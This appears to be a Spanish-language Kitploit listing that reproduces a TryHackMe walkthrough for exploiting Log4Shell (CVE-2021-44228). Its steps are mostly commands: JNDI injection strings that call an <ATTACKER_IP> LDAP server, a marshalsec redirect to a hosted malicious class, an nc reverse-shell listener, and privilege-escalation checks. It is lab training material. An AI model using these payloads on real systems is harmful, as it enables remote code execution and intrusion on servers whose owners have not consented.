Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
solar-exploiting-log4j — Este repositorio proporciona una guía detallada de la sala *Solar Exploiting Log4j* en TryHackMe, centrada en explotar la vulnerabilidad crítica Log4Shell (CVE-2021-44228). El proyecto demuestra cómo los atacantes pueden aprovechar mecanismos de registro inseguros en aplicaciones Java para lograr la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/lavanya2085/solar-exploiting-log4j
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
hace 5 mesesAún no revisado

Este repositorio proporciona una guía detallada de la sala *Solar Exploiting Log4j* en TryHackMe, centrada en explotar la vulnerabilidad crítica Log4Shell (CVE-2021-44228). El proyecto demuestra cómo los atacantes pueden aprovechar mecanismos de registro inseguros en aplicaciones Java para lograr la ejecución remota de código.

Compartir

🔥 Solar Exploiting Log4j - Walkthrough de TryHackMe

📌 Sala: Solar Exploiting Log4j

Plataforma: TryHackMe Dificultad: Media Tema: Log4Shell (Vulnerabilidad Log4j)


🧠 Objetivo

Explota la vulnerabilidad Log4j (CVE-2021-44228) para obtener ejecución remota de código y capturar flags.


🛠️ Herramientas Utilizadas

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Paso 1: Reconocimiento

🔍 Escanear el Objetivo

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Hallazgos

  • Puertos abiertos: 80 (HTTP), otros dependiendo de la sala
  • Aplicación web con backend basado en Java

🌐 Paso 2: Enumeración Web

  • Visita la aplicación web en el navegador
  • Interactúa con los campos de entrada (login/búsqueda/cabeceras)
  • Captura la petición con Burp Suite

💥 Paso 3: Identificar la Vulnerabilidad Log4j

La vulnerabilidad Log4j permite la inyección JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Si la entrada se registra → la vulnerabilidad existe.


⚙️ Paso 4: Configurar el Listener

Iniciar Netcat

root@kitploit:~
nc -lvnp 4444

Iniciar Servidor LDAP Malicioso (Ejemplo)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Ejecuta el servidor LDAP:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Paso 5: Alojar el Payload

root@kitploit:~
python3 -m http.server 8000

Crea la clase Java maliciosa (Exploit.class)


🚀 Paso 6: Disparar el Exploit

Inyecta el payload en el campo vulnerable:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Usa cabeceras como:

  • User-Agent
  • X-Api-Version

🖥️ Paso 7: Obtener Reverse Shell

Una vez disparado:

  • El objetivo se conecta de vuelta al listener de Netcat
  • Obtienes acceso a la shell

🔐 Paso 8: Escalada de Privilegios (si es necesario)

Comprueba:

root@kitploit:~
sudo -l

Busca:

  • Binarios SUID mal configurados
  • Archivos escribibles
  • Trabajos cron

🚩 Paso 9: Capturar Flags

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Conceptos Clave Aprendidos

  • Log4Shell (CVE-2021-44228)
  • Inyección JNDI
  • Ejecución Remota de Código (RCE)
  • Reverse Shell
  • Explotación Web

Descargar herramienta